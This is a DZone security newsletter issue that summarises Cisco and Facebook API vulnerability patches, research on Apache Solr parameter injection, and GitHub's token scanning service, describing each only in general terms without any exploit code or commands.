DZone
Writers Zone
Thanks for visiting DZone today,
Edit Profile
  • Manage Email Subscriptions
  • How to Post to DZone
  • Article Submission Guidelines
Sign Out View Profile
  • Post an Article
  • Manage My Drafts
Over 2 million developers have joined DZone.
Log In / Join
  • Refcardz
  • Trend Reports
  • Webinars
  • Zones
  • |
    • Agile
    • AI
    • Big Data
    • Cloud
    • Database
    • DevOps
    • Integration
    • IoT
    • Java
    • Microservices
    • Open Source
    • Performance
    • Security
    • Web Dev
DZone > Writers Zone > API Security Weekly: Issue #46

API Security Weekly: Issue #46

From Facebook and Cisco API patches to Solr parameter injection; your one-stop-shot for all things API security.

Dmitry Sotnikov user avatar by
Dmitry Sotnikov
CORE ·
May. 26, 22 · Writers Zone · News
Like (4)
Save
Tweet
22.90K Views

Join the DZone community and get the full member experience.

Join For Free

Image title

Facebook patching their APIs like

This week, Cisco and Facebook have patched their APIs, a detailed report on Solr parameter injection is out, and GitHub continues their fight against API keys and tokens in public repositories.

You may also like: RESTful API Security.

Vulnerabilities: Cisco

Cisco has released patches for several critical API security flaws in its Cisco Unified Computing System (UCS) software and Small Business 220 Series Smart Switch routers. The patches center around the APIs behind the web-based management interfaces.

With both UCS Director and UCS Director Express for Big Data, improper handling of authentication requests and insufficient validation of request headers could allow attackers to either bypass authentication completely or login using the SCP User account that had default credentials. Attackers could then execute arbitrary commands, or even get administrator access.

On the router side, insufficient authorization checks could allow attackers to send malicious requests to modify device configuration or inject a reverse shell. Another vulnerability could allow an unauthenticated attacker to trigger a buffer overflow and subsequently remotely execute arbitrary code.

This serves as yet another lesson on the importance of proper validation of all parameters, payloads, and headers coming in, as well as proper authorization implementation.

Vulnerabilities: Facebook

In a less sinister case, an authorization vulnerability (aka IDOR) in Facebook API allowed Philippe Harewood to disassociate the profile picture of any user from their profile.

Profile_picture_remove API call had a profile_id parameter that an attacker could substitute with an ID of any other Facebook user.

Although the disassociated picture was not deleted from the account and the profile picture was replaced with Facebook’s default one, this is still an authorization vulnerability, so Facebook fixed the vulnerability with a bounty award sent to the researcher.

Vulnerabilities: Apache Solr Injection

Apache Solr is an open source enterprise search platform. The Solr API uses only HTTP protocol and is available without any authentication by default.

In his research, Michael Stepankin from Veracode has explored how this could turn into an exploitable vulnerability. He discusses:

  • Solr Parameters Injection (HTTP smuggling).
  • Solr Local Parameters Injection.
  • Remote code execution (RCE) through Apache Solar Injection.

All examples have details and sample API calls.

Tools: GitHub Token Scanning service

Leaked API keys remain one of the major sources of API breaches. Just like with a username and password, anyone having an API key can invoke an external API on your behalf. For example, this is how Samsung SmartThings service got hacked recently.

About a year ago, GitHub started their Token Scanning service that identifies tokens shared in public repositories. The service only works with tokens from specific vendors in formats known to it. Not only does the developer get notified, but GitHub also tells the corresponding partner about the leak so the token can get revoked.

The service initially launched with support for tokens from Alibaba Cloud, AWS, Azure, Google Cloud, Mailgun, npm, Slack, Stripe, and Twilio.

GitHub has just reported crossing the threshold of 1 bln potential tokens identified, and added more partners: Atlassian, Dropbox, Discord, Proctorio, and Pulumi.

The one billion mark is staggering by itself. It shows how wide-spread the issue is.


Related Articles

  • How to Secure APIs. 

API security mobile app Vulnerability

Published at DZone with permission of Dmitry Sotnikov, DZone MVB. See the original article here.

Opinions expressed by DZone contributors are their own.

Popular on DZone

  • How Template Literal Types Work in TypeScript
  • Deploying Java Applications to AWS Elastic Beanstalk
  • Troubleshooting HTTP 502 Bad Gateway in AWS EBS
  • API Security Weekly: Issue 165

Comments

Writers Partner Resources

X

ABOUT US

  • About DZone
  • Send feedback
  • Careers
  • Sitemap

ADVERTISE

  • Advertise with DZone

CONTRIBUTE ON DZONE

  • Article Submission Guidelines
  • MVB Program
  • Become a Contributor
  • Visit the Writers' Zone

LEGAL

  • Terms of Service
  • Privacy Policy

CONTACT US

  • 600 Park Offices Drive
  • Suite 300
  • Durham, NC 27709
  • support@dzone.com
  • +1 (919) 678-0300

Let's be friends:

DZone.com is powered by 

AnswerHub logo